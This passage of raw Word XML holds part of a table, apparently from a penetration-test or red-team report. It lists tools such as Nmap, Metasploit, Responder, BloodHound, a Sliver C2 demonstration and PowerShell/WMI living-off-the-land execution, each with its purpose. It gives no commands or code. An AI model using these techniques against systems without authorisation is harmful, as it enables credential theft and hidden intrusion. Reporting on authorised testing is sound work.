          <w:p w14:paraId="006D4A8F" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4911" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7BD20405" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Host and service discovery, version detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="42F13D3C" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Real</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="5F267DF3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2554" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5EE8A26F" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4911" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1DAC63CD" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Web application testing and request manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="797D8364" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Real</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="57887EA9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2554" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="62BABF66" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Metasploit Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4911" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="314D8A04" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Exploit delivery and session management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06B48CC1" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Real</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="769D741A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2554" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2A6FFC3A" w14:textId="3DEED2BA" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00B8582B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Responder Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4911" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="252C06F4" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Credential capture on the internal segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="251375DD" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Real</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="38CE1DFE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2554" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="117BFAF7" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BloodHound</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4911" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C579066" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Active Directory attack-path analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="264B7B83" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Real</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="7C2B8D65" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2554" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5661651A" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Sliver (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4911" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="71706963" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Command-and-control and stealth demonstration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0087FE18" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Simulated / lab-only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="451EA337" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2554" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2DDC621E" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LOLBins</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (PowerShell, WMI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4911" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7AACD2AA" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Living-off-the-land execution to reduce detectability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="531AC5AF" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Real (technique)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BA0A9AC" w14:textId="45E320EC" w:rsidR="00B8582B" w:rsidRPr="00796916" w:rsidRDefault="00B8582B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc234776732"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
